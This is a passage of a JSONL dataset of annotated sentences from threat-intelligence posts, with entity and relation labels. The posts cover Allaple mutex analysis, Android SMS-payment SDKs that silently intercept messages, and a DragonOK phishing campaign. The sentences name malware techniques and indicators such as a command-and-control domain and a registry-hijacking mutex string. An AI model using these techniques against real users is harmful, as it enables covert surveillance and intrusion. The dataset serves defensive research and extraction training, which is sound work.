“statistical”.","entities":[],"relations":[],"Comments":[]} {"id":1130,"text":"Meaning that the mutex either itself indicates a benign or malware sample, or that the mutex alone is not enough to make a determination and the statistical ratio of benign to malware is the best it can offer.","entities":[],"relations":[],"Comments":[]} {"id":1131,"text":" The backlog of already collected mutexes is too great for a small team of researchers to meaningfully tackle without some kind of ranking system.","entities":[],"relations":[],"Comments":[]} {"id":1132,"text":"Luckily, the most objective piece of data collected about each mutex, how many samples were classified benign vs. malware, has all the information necessary to ensure that the researchers’ tackle the low hanging fruit first.","entities":[],"relations":[],"Comments":[]} {"id":1133,"text":" With over hundreds of thousands of malware associations, this specific mutex is associated exclusively with the Net-worm:W32\/Allaple malware family which has been around since 2006 but continues to propagate and reinvent itself through the years.","entities":[{"id":46569,"label":"malware","start_offset":113,"end_offset":133},{"id":46570,"label":"TIME","start_offset":177,"end_offset":181}],"relations":[],"Comments":[]} {"id":1134,"text":" Though the fact that the malware writer obviously named the mutex by rolling their face on the keyboard made it obvious before we'd done any further analysis that we’d found a unique identifier within the binaries.","entities":[],"relations":[],"Comments":[]} {"id":1135,"text":" This malware is well documented as a powerful polymorphic worm that encrypts itself differently every time it propagates.","entities":[],"relations":[],"Comments":[]} {"id":1136,"text":"The evasive nature of this malware family leads to a different file hash, import hash, and only a 20% average SSDeep hash overlap between the samples.","entities":[{"id":46571,"label":"tools","start_offset":110,"end_offset":116}],"relations":[],"Comments":[]} {"id":1137,"text":"But because the mutex name is set at compile time, the mutex itself offers a common thread between all of the samples we collected and analyzed.","entities":[],"relations":[],"Comments":[]} {"id":1138,"text":" However, this particular mutex was associated with only a recent subset of the Allaple family.","entities":[{"id":46572,"label":"malware","start_offset":80,"end_offset":87}],"relations":[],"Comments":[]} {"id":1139,"text":" Unlike many other avenues of research and classification, mutex name based associations provides an almost trivial means of uniquely identifying common code blocks and thereby malware families.","entities":[],"relations":[],"Comments":[]} {"id":1140,"text":"The first thing our researchers noticed was the similarity between this mutex name and the previous one.","entities":[],"relations":[],"Comments":[]} {"id":1141,"text":"While programmatic analysis would have a hard time associating the two, it's obvious to a human that the same face rolling technique was used to name this mutex.","entities":[],"relations":[],"Comments":[]} {"id":1142,"text":"The author simply rolled around a bit more.","entities":[],"relations":[],"Comments":[]} {"id":1143,"text":" Quick follow up analysis revealed that this mutex was also associated with the Allaple malware family.","entities":[{"id":3512,"label":"malware","start_offset":80,"end_offset":87}],"relations":[],"Comments":[]} {"id":1144,"text":"More interestingly, it was another, non-overlapping, subset of the Allaple family.","entities":[{"id":3513,"label":"malware","start_offset":67,"end_offset":74}],"relations":[],"Comments":[]} {"id":1145,"text":"Several hypotheses followed directly from this observation.","entities":[],"relations":[],"Comments":[]} {"id":1146,"text":" Absolute proof for a few of these hypotheses may never be realized.","entities":[],"relations":[],"Comments":[]} {"id":1147,"text":"However, and lucky for us, the malware author was arrested in 2010 so several of the hypothesis can be verified.","entities":[{"id":46573,"label":"TIME","start_offset":62,"end_offset":66}],"relations":[],"Comments":[]} {"id":1148,"text":" The first is very likely due to the similarities present in the order of keys hit.","entities":[],"relations":[],"Comments":[]} {"id":1149,"text":"Both begin with “jhd”.","entities":[],"relations":[],"Comments":[]} {"id":1150,"text":"“jh” itself is more common than would be expected given that, with fingers on the home row, it requires the right index finger to move and press another key before any other key is struck.","entities":[],"relations":[],"Comments":[]} {"id":1151,"text":"And “jh” is always followed by a key from the left side of the keyboard.","entities":[],"relations":[],"Comments":[]} {"id":1152,"text":"These unique consistencies make it extremely improbable that two different people named these mutexes.","entities":[],"relations":[],"Comments":[]} {"id":1153,"text":" The second mutex appears to be a concerted effort to make the mutex seem “more random” than the first.","entities":[],"relations":[],"Comments":[]} {"id":1154,"text":"It's immediately obvious that the author didn't move his fingers\/hands much while typing the first.","entities":[],"relations":[],"Comments":[]} {"id":1155,"text":"It’s obvious enough that the author likely noticed it when reworking this section of code.","entities":[],"relations":[],"Comments":[]} {"id":1156,"text":"It's highly improbable that one would see the second mutex and make a concerted effort to make it appear “less random”.","entities":[],"relations":[],"Comments":[]} {"id":1157,"text":"And, as can be quickly verified by searching through standard virus detection logs, the mutexes did in fact appear in the hypothesized order.","entities":[],"relations":[],"Comments":[]} {"id":1158,"text":" The third is likely due to the lack of overlap between mutex names.","entities":[],"relations":[],"Comments":[]} {"id":1159,"text":"However, the research necessary to conclusively prove this hypothesis would be very time consuming and provide little other benefit.","entities":[],"relations":[],"Comments":[]} {"id":1160,"text":" The fourth is likely due to the mutexes only appearing in a single malware family.","entities":[],"relations":[],"Comments":[]} {"id":1161,"text":"If this functionality were available in some more open source setting, and was of even moderate quality, we would expect to see it used in other malware families as well.","entities":[],"relations":[],"Comments":[]} {"id":1162,"text":"As this functionality has not migrated outside the Allaple family, either the quality of the code is bad (see: face rolling), or it's simply not available to other malware developers. The fifth is very likely as a change to the specific functionality these mutexes protect, with every change to any functionality, is simply not a practical method of development.","entities":[{"id":46578,"label":"malware","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} {"id":1163,"text":"And indeed, as with the second hypothesis, standard virus detection logs prove that each of these mutexes do span multiple variants of the worm.","entities":[],"relations":[],"Comments":[]} {"id":1164,"text":" Mutex names provide a window into the entire development process and timeline for malware.","entities":[],"relations":[],"Comments":[]} {"id":1165,"text":"Idiosyncrasies of the malware author become apparent, the evolution can be traced, the availability or quality of code deduced, and reuse of functionality made clear with a simple mutex.","entities":[],"relations":[],"Comments":[]} {"id":1166,"text":"No other currently used method of analysis offers such a personal view into malware development.","entities":[],"relations":[],"Comments":[]} {"id":1167,"text":" Mutex name analysis as a whole offers a unique look into the results of any sample classification system and the malware therein.","entities":[],"relations":[],"Comments":[]} {"id":1168,"text":"While the research may never result in a fully automated decision system, it has been proven that researchers employing a hybrid approach to analysis will be able to provide critical and timely information to support the continual improvement of the classification system as a whole.","entities":[],"relations":[],"Comments":[]} {"id":1169,"text":" From edge case to systematic misclassifications, mutex usage is even more generally the canary in a coal mine than was previously realized. While tedious and time consuming, combing through mutex names did come with more than a few good laughs.","entities":[],"relations":[],"Comments":[]} {"id":1170,"text":"After nearly as much debate as some of the real research, we’ve whittled the list down to our favorites (For the curious, these are all malware mutexes).","entities":[],"relations":[],"Comments":[]} {"id":1171,"text":"Enjoy.","entities":[],"relations":[],"Comments":[]} {"id":1172,"text":"Pluguin - When penguins and wall sockets mate.","entities":[],"relations":[],"Comments":[]} {"id":1173,"text":"Development environments don’t have spell check but, maybe they should.","entities":[],"relations":[],"Comments":[]} {"id":1174,"text":" senna spy rock in rio 2001 virus - Subtlety.","entities":[{"id":46580,"label":"malware","start_offset":1,"end_offset":27}],"relations":[],"Comments":[]} {"id":1175,"text":"Overwhelming.","entities":[],"relations":[],"Comments":[]} {"id":1176,"text":"There were many variations on this one, Senna’s obviously proud of his work.","entities":[{"id":46581,"label":"identity","start_offset":40,"end_offset":46}],"relations":[],"Comments":[]} {"id":1177,"text":" chinese-hacker-2 - We’re not sure which is worse: that this is a legitimate signature or a sad frame job.","entities":[],"relations":[],"Comments":[]} {"id":1178,"text":"Either way, somebody needs their computer privileges revoked.","entities":[],"relations":[],"Comments":[]} {"id":1179,"text":" mutexpolesskayaglush*.*svchost.comexefile\\shell\\open\\command %1 %*@ - Putting shell code in a mutex name is right on the border of brilliant and insane.","entities":[],"relations":[],"Comments":[]} {"id":1180,"text":"We’ll leave that determination to the reader.","entities":[],"relations":[],"Comments":[]} {"id":1181,"text":"mr_coolface - Really, not so much, no.","entities":[],"relations":[],"Comments":[]} {"id":1182,"text":" don't stop me!","entities":[],"relations":[],"Comments":[]} {"id":1183,"text":"i need some money!","entities":[],"relations":[],"Comments":[]} {"id":1184,"text":"- http:\/\/www.monster.com\/ - don’t say we never did anything for you.","entities":[{"id":46582,"label":"URL","start_offset":2,"end_offset":25}],"relations":[],"Comments":[]} {"id":1185,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1186,"text":"Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":1187,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1188,"text":"In-App Purchase (IAP) has become a popular way to sell services and virtual items through mobile applications.","entities":[],"relations":[],"Comments":[]} {"id":1189,"text":"In the Android ecosystem, in addition to the official IAP service by Google, there are many third-party IAP Software Development Kits (SDKs) spread around the world.","entities":[{"id":46584,"label":"identity","start_offset":69,"end_offset":75},{"id":46583,"label":"SOFTWARE","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} {"id":1190,"text":" Some of these third-party SDKs provide IAP services based on existing online payment platforms.","entities":[],"relations":[],"Comments":[]} {"id":1191,"text":"However, an increasingly popular method uses premium SMS.","entities":[],"relations":[],"Comments":[]} {"id":1192,"text":"A primary reason for the popularity of SMS-based IAP is that it does not require Internet connectivity, just cell service.","entities":[],"relations":[],"Comments":[]} {"id":1193,"text":"While this is more convenient for both users and developers, there are significant security concerns with using SMS-based IAP on Android.","entities":[{"id":46585,"label":"SOFTWARE","start_offset":129,"end_offset":136}],"relations":[],"Comments":[]} {"id":1194,"text":" These concerns are detailed below.","entities":[],"relations":[],"Comments":[]} {"id":1195,"text":" Installing an Android app with SMS-based IAP is almost equivalent to installing an “SMS manager” (or even a “contacts manager”) app on the phone.","entities":[{"id":46586,"label":"SOFTWARE","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} {"id":1196,"text":"The reason is because most SMS-based IAP SDKs include comprehensive functionalities to monitor, manage, and even intercept a user’s SMS communication silently in the background, without any user interaction or knowledge.","entities":[],"relations":[],"Comments":[]} {"id":1197,"text":"This is a critical point: these SMS-based IAPs are able to independently send, receive, or block any SMS to\/from any cellphone on which they are installed, without the user having any idea this is occurring.","entities":[],"relations":[],"Comments":[]} {"id":1198,"text":"This can include receiving instructions from a cloud server under the control of the SDK author.","entities":[],"relations":[],"Comments":[]} {"id":1199,"text":" Palo Alto Networks Wildfire, through custom SMS blocking policies, recently discovered eight different SMS-based IAP SDKs with this abusive functionality.","entities":[{"id":46588,"label":"SOFTWARE","start_offset":1,"end_offset":28}],"relations":[],"Comments":[]} {"id":1200,"text":"Further investigation shows that these SDKs have been used in at least 25 different Android games in two third-party app markets, JoloPlay and Wanyx.","entities":[{"id":46589,"label":"SOFTWARE","start_offset":84,"end_offset":91},{"id":46590,"label":"SOFTWARE","start_offset":130,"end_offset":138},{"id":46591,"label":"SOFTWARE","start_offset":143,"end_offset":148}],"relations":[],"Comments":[]} {"id":1201,"text":"17 of the top 50 games in JoloPlay contain at least one of these IAP SDKs.","entities":[{"id":46592,"label":"SOFTWARE","start_offset":26,"end_offset":34}],"relations":[],"Comments":[]} {"id":1202,"text":"According to JoloPlay’s website, these 17 games have been downloaded and installed more than 1.7 million times.","entities":[{"id":46593,"label":"SOFTWARE","start_offset":13,"end_offset":22}],"relations":[],"Comments":[]} {"id":1203,"text":"Most of them are pirated or repackaged from famous Android games, such as Plants vs. Zombies 2, Jewels Maze, Fishing Joy, and Where's My Water.","entities":[{"id":46594,"label":"SOFTWARE","start_offset":51,"end_offset":58},{"id":44936,"label":"SOFTWARE","start_offset":74,"end_offset":94},{"id":44937,"label":"SOFTWARE","start_offset":96,"end_offset":107},{"id":44938,"label":"SOFTWARE","start_offset":109,"end_offset":120},{"id":44939,"label":"SOFTWARE","start_offset":126,"end_offset":142}],"relations":[],"Comments":[]} {"id":1204,"text":"According to Wanyx’s website, 12 of the 50 games in Wanyx’s suggested games column contain the discussed IAP SDKs.","entities":[{"id":46596,"label":"identity","start_offset":13,"end_offset":18},{"id":46597,"label":"identity","start_offset":52,"end_offset":58}],"relations":[],"Comments":[]} {"id":1205,"text":" In Wildfire, we classify apps using these IAP SDKs as Potentially Unwanted Applications (PUA).","entities":[{"id":46599,"label":"SOFTWARE","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} {"id":1206,"text":"The reason they are not marked as malware is because all SDKs require user interaction when making a purchase (e.g. user clicks on the agreement). However, these IAP SDKs are very dangerous to users because of what they are doing with a user’s SMS without his or her knowledge.","entities":[],"relations":[],"Comments":[]} {"id":1207,"text":" Below are the details of eight SMS-based IAP SDKs discovered by Wildfire:","entities":[{"id":46600,"label":"SOFTWARE","start_offset":65,"end_offset":73}],"relations":[],"Comments":[]} {"id":1208,"text":" All of the identified IAP SDKs use premium SMS to provide the IAP service.","entities":[],"relations":[],"Comments":[]} {"id":1209,"text":"They implement code that will send SMS to pre-defined premium numbers (Figure 1).","entities":[],"relations":[],"Comments":[]} {"id":1210,"text":"This code implementation is also abstracted in an interface for developers.","entities":[],"relations":[],"Comments":[]} {"id":1211,"text":" However, in addition to sending, all of these IAP SDKs also implement a BroadcastReceiver and register it for SMS_RECEIVED actions (Figure 2). In addition, Umpay, WiPay, and NgstreamPay will also register a ContentObserver to monitor all changes in an SMS inbox (Figure 3). ","entities":[{"id":46601,"label":"SOFTWARE","start_offset":158,"end_offset":163},{"id":46602,"label":"SOFTWARE","start_offset":165,"end_offset":170},{"id":46603,"label":"SOFTWARE","start_offset":176,"end_offset":188}],"relations":[],"Comments":[]} {"id":1212,"text":"After an SMS is received, these receivers and observers will check the originating number and\/or message body, and block the SMS by some policies (Figure 3 and Figure 4).","entities":[],"relations":[],"Comments":[]} {"id":1213,"text":" For example, in Figure 4, the policy is defined as deleting SMS satisfying two conditions at the same time: 1. Message comes from the phone number “+8610658008” or “10658008” 2.","entities":[],"relations":[],"Comments":[]} {"id":1214,"text":"The message body contains the term “You will use” (translated from Chinese shown in Figure 4).","entities":[],"relations":[],"Comments":[]} {"id":1215,"text":"Some of these policies are hard-coded in the SDKs, e.g., in UmPay; but others are pre-fetched from cloud servers that are operated by the SDKs’ providers (Figure 5). ","entities":[{"id":46604,"label":"SOFTWARE","start_offset":60,"end_offset":65}],"relations":[],"Comments":[]} {"id":1216,"text":"Again, all the functions mentioned above run silently in the background.","entities":[],"relations":[],"Comments":[]} {"id":1217,"text":"Except for LinkSMSPayment, all the IAP SDKs listed in this post do not notify the user in any way that they are taking actions against the user’s daily SMS communication.","entities":[],"relations":[],"Comments":[]} {"id":1218,"text":"Users have no idea if an SMS was blocked or if it was delivered.","entities":[],"relations":[],"Comments":[]} {"id":1219,"text":" All of the IAP SDKs in this post target Chinese users.","entities":[],"relations":[],"Comments":[]} {"id":1220,"text":"Both SMS sending and SMS blocking will only affect Android phones with a valid Chinese mobile phone number.","entities":[{"id":46605,"label":"SOFTWARE","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} {"id":1221,"text":"Some of them will even check which SIM operator a user is using (Figure 6).","entities":[],"relations":[],"Comments":[]} {"id":1223,"text":" An interesting observation is that half of these IAP SDKs implement the send and block SMS functions in separate codes.","entities":[],"relations":[],"Comments":[]} {"id":1224,"text":"More specifically, the code was separated into two parts.","entities":[],"relations":[],"Comments":[]} {"id":1225,"text":"One piece is embedded into Android apps or games for developers as a part of the source code.","entities":[{"id":46608,"label":"SOFTWARE","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} {"id":1226,"text":"The other piece is included separately in the assets directory in APK files, and will be invoked by Java reflection in runtime (Figure 7).","entities":[],"relations":[],"Comments":[]} {"id":1227,"text":"For example, JoloPay, WiPay, TPADPay and EgamePay follow this design exactly.","entities":[{"id":44941,"label":"SOFTWARE","start_offset":13,"end_offset":20},{"id":44942,"label":"SOFTWARE","start_offset":22,"end_offset":27},{"id":44943,"label":"SOFTWARE","start_offset":30,"end_offset":36},{"id":44945,"label":"SOFTWARE","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} {"id":1228,"text":"AstepPay implements both sending and blocking in the “assets\/astep.bin” file.","entities":[{"id":46610,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":46611,"label":"FILEPATH","start_offset":54,"end_offset":70}],"relations":[],"Comments":[]} {"id":1229,"text":"This separation of functions may be intended to avoid detection by security products.","entities":[],"relations":[],"Comments":[]} {"id":1230,"text":" SMS should not be used in payment or authentication for e-finance transactions.","entities":[],"relations":[],"Comments":[]} {"id":1231,"text":"On the existing Android platforms it is very easy for any installed apps to send, intercept, or even forward SMS messages in background without any user knowledge or interaction.","entities":[{"id":46612,"label":"SOFTWARE","start_offset":16,"end_offset":23}],"relations":[],"Comments":[]} {"id":1232,"text":"Previous attack cases, such as Zitmo and Cardbuyer, showed the risk of using SMS for payment authentication.","entities":[{"id":46613,"label":"malware","start_offset":31,"end_offset":36},{"id":46614,"label":"malware","start_offset":41,"end_offset":50}],"relations":[],"Comments":[]} {"id":1233,"text":"For instance: To improve the security of IAP, some payment platforms try to add a verification step in order to confirm an SMS was really sent by the user, for example, it will ask the user to reply with certain text that was sent to a phone number specified by the user.","entities":[],"relations":[],"Comments":[]} {"id":1234,"text":"However, two months ago, WildFire discovered a new Android malware, Cardbuyer, that circumvents this verification technique.","entities":[{"id":46615,"label":"SOFTWARE","start_offset":25,"end_offset":33},{"id":46616,"label":"SOFTWARE","start_offset":51,"end_offset":58},{"id":46617,"label":"malware","start_offset":68,"end_offset":77}],"relations":[],"Comments":[]} {"id":1235,"text":"Cardbuyer targets 11 different online payment platforms, as well as stolen prepaid cards, by parsing their verification SMS and automatically replying.","entities":[{"id":46618,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":1236,"text":" The good news is this technique might be partially mitigated in Android KitKat (version 4.4), where Google introduced a security enhancement around SMS security.","entities":[{"id":46619,"label":"identity","start_offset":101,"end_offset":107},{"id":46620,"label":"SOFTWARE","start_offset":65,"end_offset":93}],"relations":[],"Comments":[]} {"id":1237,"text":"A user can set a system-wide default SMS app as the only app with permission to send and receive SMS.","entities":[],"relations":[],"Comments":[]} {"id":1238,"text":"However, other installed apps are still allowed to receive SMS and upload the content via Internet.","entities":[],"relations":[],"Comments":[]} {"id":1239,"text":"But as of June 4, 2014, only 13.6% of worldwide users had installed Android 4.4 or above.","entities":[{"id":44947,"label":"TIME","start_offset":10,"end_offset":22},{"id":44948,"label":"SOFTWARE","start_offset":68,"end_offset":80}],"relations":[],"Comments":[]} {"id":1240,"text":"This means more than 86% of Android users do not benefit from this enhancement and are vulnerable.","entities":[{"id":46621,"label":"SOFTWARE","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} {"id":1241,"text":"However, Palo Alto Networks users are protected from these PUAs by subscribing to WildFire and GlobalProtect services.","entities":[{"id":46624,"label":"SOFTWARE","start_offset":95,"end_offset":108},{"id":46625,"label":"identity","start_offset":9,"end_offset":27},{"id":46622,"label":"SOFTWARE","start_offset":82,"end_offset":90}],"relations":[],"Comments":[]} {"id":1242,"text":" SMS-based IAP SDKs have become a gray zone that needs close attention.","entities":[],"relations":[],"Comments":[]} {"id":1243,"text":"Because of convenience and popularity, SMS-based IAP will likely continue to spread and increase in worldwide use.","entities":[],"relations":[],"Comments":[]} {"id":1244,"text":"However, users need to be protected from PUAs and malware that abuses the SMS-based IAP.","entities":[],"relations":[],"Comments":[]} {"id":1245,"text":"Also, developers need to be aware that SMS cannot meet security requirements (e.g. authentication) during the payment transactions.","entities":[],"relations":[],"Comments":[]} {"id":1246,"text":" We would like to thank Kyle Sanders for his contribution to this work.","entities":[{"id":46626,"label":"identity","start_offset":24,"end_offset":36}],"relations":[],"Comments":[]} {"id":1247,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1248,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1249,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1250,"text":"This post is also available in: 日本語 (Japanese) Palo Alto Networks Unit 42","entities":[{"id":3816,"label":"identity","start_offset":53,"end_offset":71},{"id":3817,"label":"identity","start_offset":72,"end_offset":79}],"relations":[],"Comments":[]} {"id":1251,"text":"used the AutoFocus threat intelligence service to identify a series of phishing attacks against Japanese organizations.","entities":[{"id":46627,"label":"SOFTWARE","start_offset":9,"end_offset":18},{"id":44949,"label":"identity","start_offset":96,"end_offset":118},{"id":44950,"label":"attack-pattern","start_offset":71,"end_offset":87}],"relations":[],"Comments":[]} {"id":1252,"text":"Using AutoFocus to quickly search and correlate artifacts across the collective set of WildFire and other Palo Alto Networks threat intelligence, we were able to associate the attacks with the group publicly known as “DragonOK.”","entities":[{"id":3823,"label":"malware","start_offset":87,"end_offset":95},{"id":3826,"label":"threat-actor","start_offset":218,"end_offset":226},{"id":46628,"label":"SOFTWARE","start_offset":6,"end_offset":15},{"id":46629,"label":"identity","start_offset":106,"end_offset":124}],"relations":[{"id":196,"from_id":3826,"to_id":3823,"type":"authored-by"}],"Comments":[]} {"id":1253,"text":"[1] These attacks took place between January and March of 2015.","entities":[{"id":46630,"label":"TIME","start_offset":37,"end_offset":62}],"relations":[],"Comments":[]} {"id":1254,"text":" DragonOK has previously targeted Japanese high-tech and manufacturing firms, but we’ve identified a new backdoor malware, named “FormerFirstRAT,” deployed by these attackers.","entities":[{"id":3828,"label":"threat-actor","start_offset":1,"end_offset":9},{"id":3832,"label":"malware","start_offset":130,"end_offset":144},{"id":44952,"label":"identity","start_offset":34,"end_offset":76}],"relations":[{"id":198,"from_id":3832,"to_id":3828,"type":"authored-by"},{"id":197,"from_id":3828,"to_id":44952,"type":"targets"}],"Comments":[]} {"id":1255,"text":"See the “Malware Details” section for analysis of the three RATs and two additional backdoors deployed in this persistent attack campaign.","entities":[],"relations":[],"Comments":[]} {"id":1256,"text":" This campaign involved five separate phishing attacks, each carrying a different variant of Sysget malware, also known as HelloBridge.","entities":[{"id":46631,"label":"attack-pattern","start_offset":38,"end_offset":54},{"id":46632,"label":"malware","start_offset":93,"end_offset":99},{"id":46633,"label":"malware","start_offset":123,"end_offset":134}],"relations":[{"id":199,"from_id":46633,"to_id":46632,"type":"variant-of"}],"Comments":[]} {"id":1257,"text":"The malware was included as an attachment intended to trick the user into opening the malware.","entities":[{"id":44954,"label":"attack-pattern","start_offset":31,"end_offset":81}],"relations":[],"Comments":[]} {"id":1258,"text":"This included altering the icon of the executable to appear as other file types (Figure 1) as well as decoy documents to trick users into thinking they had opened a legitimate file.","entities":[],"relations":[],"Comments":[]} {"id":1259,"text":" Figure 1. Icons used by malicious Sysget attachments.","entities":[{"id":46635,"label":"malware","start_offset":35,"end_offset":41}],"relations":[],"Comments":[]} {"id":1260,"text":" All of the Sysget files used in this campaign communicate with a single command and control (C2) server, hosted at biosnews[.]info.","entities":[{"id":44955,"label":"DOMAIN","start_offset":116,"end_offset":131},{"id":44956,"label":"Infrastucture","start_offset":73,"end_offset":105},{"id":44957,"label":"malware","start_offset":12,"end_offset":24}],"relations":[{"id":42,"from_id":44957,"to_id":44956,"type":"communicates-with"},{"id":201,"from_id":44956,"to_id":44955,"type":"hosts"}],"Comments":[]} {"id":1261,"text":"Sysget communicates with this server using the HTTP protocol; see the Malware Details section for specifics of the command and control traffic.","entities":[{"id":46636,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":1262,"text":"All five phishing campaigns targeted a Japanese manufacturing firm over the course of two months, but the final campaign also targeted a separate Japanese high-tech organization.","entities":[{"id":46637,"label":"attack-pattern","start_offset":9,"end_offset":27},{"id":46639,"label":"identity","start_offset":146,"end_offset":177},{"id":46638,"label":"identity","start_offset":39,"end_offset":61}],"relations":[{"id":203,"from_id":46637,"to_id":46639,"type":"targets"},{"id":202,"from_id":46637,"to_id":46638,"type":"targets"}],"Comments":[]} {"id":1263,"text":"(Figure 2)","entities":[],"relations":[],"Comments":[]} {"id":1264,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":1265,"text":"Five Sysget samples used to target two Japanese organizations.","entities":[{"id":46640,"label":"identity","start_offset":39,"end_offset":61},{"id":46641,"label":"malware","start_offset":5,"end_offset":11}],"relations":[],"Comments":[]} {"id":1266,"text":" Four of the five Sysget variants included a form of decoy document to trick users into believing they had opened a legitimate file rather than malware.","entities":[{"id":46642,"label":"malware","start_offset":18,"end_offset":24},{"id":44958,"label":"attack-pattern","start_offset":53,"end_offset":67}],"relations":[{"id":204,"from_id":46642,"to_id":44958,"type":"uses"}],"Comments":[]} {"id":1267,"text":"Two of the executables used decoy documents that included information about obituaries.","entities":[],"relations":[],"Comments":[]} {"id":1268,"text":"Figure 3 shows a GIF file containing an obituary notice for a woman, while Figure 4 shows a Microsoft Word document containing the obituary of a man.","entities":[{"id":46643,"label":"SOFTWARE","start_offset":92,"end_offset":106}],"relations":[],"Comments":[]} {"id":1269,"text":" Figure 3. Japanese decoy document containing an obituary notice for a woman.","entities":[{"id":44959,"label":"attack-pattern","start_offset":20,"end_offset":34}],"relations":[],"Comments":[]} {"id":1270,"text":" Figure 4. Japanese decoy document containing an obituary notice for a woman.","entities":[{"id":46644,"label":"attack-pattern","start_offset":20,"end_offset":34}],"relations":[],"Comments":[]} {"id":1271,"text":" The Sysget sample with a PDF icon created a second executable, named Adobe.exe, which simply displayed the following warning.","entities":[{"id":46645,"label":"malware","start_offset":5,"end_offset":11},{"id":46646,"label":"FILEPATH","start_offset":70,"end_offset":79}],"relations":[],"Comments":[]} {"id":1272,"text":" Figure 5. Error message generated by Adobe.exe ","entities":[{"id":44960,"label":"FILEPATH","start_offset":38,"end_offset":47}],"relations":[],"Comments":[]} {"id":1273,"text":"The final Sysget sample used a Microsoft Excel icon and opened an Excel document that contained cells filled with “XXXXXX.”","entities":[{"id":46648,"label":"SOFTWARE","start_offset":66,"end_offset":71},{"id":46647,"label":"SOFTWARE","start_offset":31,"end_offset":46},{"id":46649,"label":"malware","start_offset":9,"end_offset":16}],"relations":[],"Comments":[]} {"id":1274,"text":"(Figure 6) Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":1275,"text":"Excel spreadsheet with Xs in multiple rows and columns.","entities":[{"id":44961,"label":"SOFTWARE","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":1276,"text":" These Sysget variants appear to be a first stage payload in these attacks.","entities":[{"id":46650,"label":"malware","start_offset":7,"end_offset":13}],"relations":[],"Comments":[]} {"id":1277,"text":"During analysis of this threat, we identified five additional backdoor tools hosted on biosnews[.]info which may be downloaded by the Sysget variants once the attackers have established a foothold.","entities":[{"id":46651,"label":"DOMAIN","start_offset":87,"end_offset":102},{"id":46652,"label":"malware","start_offset":134,"end_offset":140}],"relations":[{"id":206,"from_id":46651,"to_id":46652,"type":"hosts"}],"Comments":[]} {"id":1278,"text":" Three of the backdoors, NFlog, PoisonIvy, and NewCT have previously been publicly associated with DragonOK.","entities":[{"id":44962,"label":"malware","start_offset":25,"end_offset":30},{"id":44963,"label":"malware","start_offset":32,"end_offset":41},{"id":44964,"label":"malware","start_offset":47,"end_offset":52},{"id":44965,"label":"threat-actor","start_offset":99,"end_offset":107}],"relations":[{"id":48,"from_id":44962,"to_id":44965,"type":"authored-by"},{"id":47,"from_id":44963,"to_id":44965,"type":"authored-by"},{"id":46,"from_id":44964,"to_id":44965,"type":"authored-by"}],"Comments":[]} {"id":1279,"text":"Additionally, the actors have now added the popular PlugX backdoor to their toolkit.","entities":[{"id":46653,"label":"malware","start_offset":52,"end_offset":66}],"relations":[],"Comments":[]} {"id":1280,"text":"An additional backdoor appears to be a new, custom-built tool, which we have not previously associated with DragonOK or any other attack group.","entities":[{"id":46654,"label":"threat-actor","start_offset":108,"end_offset":116}],"relations":[],"Comments":[]} {"id":1281,"text":"We’ve named this tool “FormerFirstRAT” as it appears to be the names used by the developers to refer to their creations.","entities":[{"id":44966,"label":"malware","start_offset":23,"end_offset":37}],"relations":[],"Comments":[]} {"id":1282,"text":"Figure 7 shows the relationship between these backdoors and their respective command and control servers.","entities":[],"relations":[],"Comments":[]} {"id":1283,"text":" Figure 7. Relationship between five additional backdoors used by DragonOK and their C2 servers in this campaign.","entities":[{"id":46655,"label":"threat-actor","start_offset":66,"end_offset":74},{"id":46656,"label":"Infrastucture","start_offset":85,"end_offset":95}],"relations":[{"id":208,"from_id":46655,"to_id":46656,"type":"uses"}],"Comments":[]} {"id":1284,"text":" The following section details the functionality of the malware deployed in this campaign.","entities":[],"relations":[],"Comments":[]} {"id":1285,"text":" Sysget\/HelloBridge ","entities":[{"id":46657,"label":"malware","start_offset":1,"end_offset":7},{"id":46658,"label":"malware","start_offset":8,"end_offset":19}],"relations":[],"Comments":[]} {"id":1286,"text":"In this campaign, Sysget samples were attached to e-mails and used various icons to trick users into infecting their systems.","entities":[{"id":46659,"label":"malware","start_offset":18,"end_offset":24}],"relations":[],"Comments":[]} {"id":1287,"text":"The majority of these samples are self-extracting executables that contain both a malicious downloader, along with a legitimate file.","entities":[{"id":44967,"label":"attack-pattern","start_offset":82,"end_offset":102}],"relations":[],"Comments":[]} {"id":1288,"text":"When the self-extracting executable is launched, the downloader and legitimate file are typically dropped in one of the following directories and then executed: When the malicious downloader is executed, it begins by creating the 'mcsong[]' event in order to ensure one instance is running.","entities":[{"id":46660,"label":"attack-pattern","start_offset":171,"end_offset":191}],"relations":[],"Comments":[]} {"id":1289,"text":"It then spawns a new instance of 'C:\\\\windows\\\\system32\\\\cmd.exe' with a window name of 'Chrome-Update'.","entities":[{"id":46661,"label":"FILEPATH","start_offset":34,"end_offset":64}],"relations":[],"Comments":[]} {"id":1290,"text":"It attempts to obtain a handle to this window using the FindWindowW API call and then proceeds to send the following command to this executable.","entities":[],"relations":[],"Comments":[]} {"id":1291,"text":"This allows the malware to indirectly execute a command within the cmd.exe process.","entities":[{"id":3938,"label":"malware","start_offset":67,"end_offset":74}],"relations":[],"Comments":[]} {"id":1292,"text":" This registry key will ensure an executable that it later downloads is configured to persist across 